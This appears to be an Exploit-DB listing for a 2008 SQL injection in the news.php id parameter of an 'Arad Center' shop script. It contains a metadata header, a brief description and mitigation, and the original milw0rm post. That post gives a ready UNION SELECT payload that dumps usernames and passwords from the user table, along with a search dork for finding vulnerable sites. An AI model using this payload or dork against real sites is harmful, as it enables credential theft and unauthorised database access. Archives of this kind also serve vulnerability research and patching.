Arad Center (news.php id) Remote SQL Injection Vulnerability

vendor:

N/A

by:

Hussin X

7.5

CVSS

HIGH

SQL Injection

CWE

Product Name: N/A

Affected Version From: N/A

Affected Version To: N/A

Patch Exists: YES

Related CWE: N/A

CPE: N/A

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: N/A

2008

Arad Center (news.php id) Remote SQL Injection Vulnerability

An attacker can exploit this vulnerability by sending a maliciously crafted HTTP request to the vulnerable server. The malicious request contains a specially crafted SQL query that can be used to extract sensitive information from the database, such as usernames and passwords. The malicious request can also be used to modify or delete data from the database.

Mitigation:

Input validation should be used to prevent SQL injection attacks. All user-supplied input should be validated and filtered before being used in an SQL query.

Source

Exploit-DB raw data:

|___________________________________________________|
|
| Arad Center  (news.php id) Remote SQL Injection Vulnerability
|
|___________________________________________________
|--------------------    Hussin X  -------------------|
|
|    Author: Hussin X
|
|    Home :  WwW.IQ-ty.CoM
|
|    email:  darkangel_g85[at]Yahoo[DoT]com
|
|___________________________________________________
|                                                                                                     |
|
| script : http://www.iranmc.com/shop.php
|
| DorK   : "Designed & Developed by N.E.T E-Commerce Group. All Rights Reserved."
|___________________________________________________|

Exploit: 
________



www.[target].com/Script/news.php?id=-1+union+select+0,0,concat(user,0x3e,pass),4+from+user--





____________________________( Greetz )_________________________________
|
|    All members of the Forum WwW.IQ-ty.CoM |  WwW.TrYaG.CC |
|
|  My friends : DeViL iRaQ | IRAQ DiveR | IRAQ_JAGUR | CraCkEr
|
|    Ghost Hacker | FAHD | Iraqihack | jiko | str0ke | Cyber-Zone | Sakab
|_____________________________________________________________________


                   Im IRAQi    |    Im TrYaGi

# milw0rm.com [2008-10-09]